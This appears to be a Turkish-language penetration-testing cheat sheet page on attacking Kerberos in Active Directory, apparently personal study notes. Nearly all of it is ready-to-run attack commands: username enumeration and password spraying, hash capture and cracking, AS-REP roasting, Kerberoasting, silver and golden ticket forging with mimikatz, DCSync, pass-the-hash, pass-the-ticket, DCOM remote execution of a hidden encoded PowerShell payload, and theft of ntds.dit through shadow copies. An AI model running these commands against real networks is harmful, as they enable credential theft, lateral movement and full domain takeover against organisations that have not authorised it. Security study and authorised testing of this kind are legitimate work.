Kerberos (88)

Kerberos Nedir?

Username Bruteforce

Wordlist: https://github.com/insidetrust/statistically-likely-usernames

kerbrute userenum -d example.local --dc 192.168.1.1 john.smith.txt -o output.txt

Password Spraying

kerbrute passwordspray -d example.local --dc 192.168.1.1 valid_users.txt 'Password123'

Capture NTLM Hash

responder -I eth0

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

AS-REP Roasting

impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
.\Rubeus.exe asreproast /nowrap

hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Kerberosting

Bu yöntemin çalışması için domainde bir kullanıcımız olmalı.

# Attacker
impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.local/pete -outputfile hashes.kerberoast
# Local
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Silver Ticket

iwr -UseDefaultCredentials http://web04 # 401 Alıyoruz

./mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

 # NTLM Hash Arıyoruz
whoami /user # SID Değerini Alıyoruz

kerberos::golden /sid:xxxxxxxxxxxxxxxx /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:xxxxxxxxxxxxxxxxx /user:jeffadmin
klist
iwr -UseDefaultCredentials http://web04 | Select-Object -Expand Content # 200 OK

DcSync

.\mimikatz.exe
lsadump::dcsync /user:corp\Administrator

impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"Password123"@192.168.50.70 -outputfile hashes.dcsync

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Over The Hash

./mimikatz
privilege::debug
sekurlsa::logonpasswords # Yetkili bir kullanıcının hashini buluyoruz
sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell
net use \\files04 # Ticket oluşturmak için istediğimiz bilgisayara bağlanıyoruz
klist # Kerberos Ticket kontrol
.\PsExec.exe \\files04 cmd # Ticket ile cmd açıyoruz

Pass The Ticket

ls \\web04\backup # 403

./mimikatz
privilege::debug
sekurlsa::tickets /export
dir *.kirbi
kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
klist

ls \\web04\backup # 200

DCOM

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e base64_rev","7")

Golden Ticket Persistence

./mimikatz
privilege::debug
lsadump::lsa /patch # Krbtgt Ticket Hash Olmalı
kerberos::purge
kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
misc::cmd
PsExec.exe \\dc1 cmd.exe

Shadow Copy Persistence

vshadow.exe -nw -p  C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
reg.exe save hklm\system c:\system.bak

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

PreviousDNS (53)NextLDAP (389,636)

Last updated 18 days ago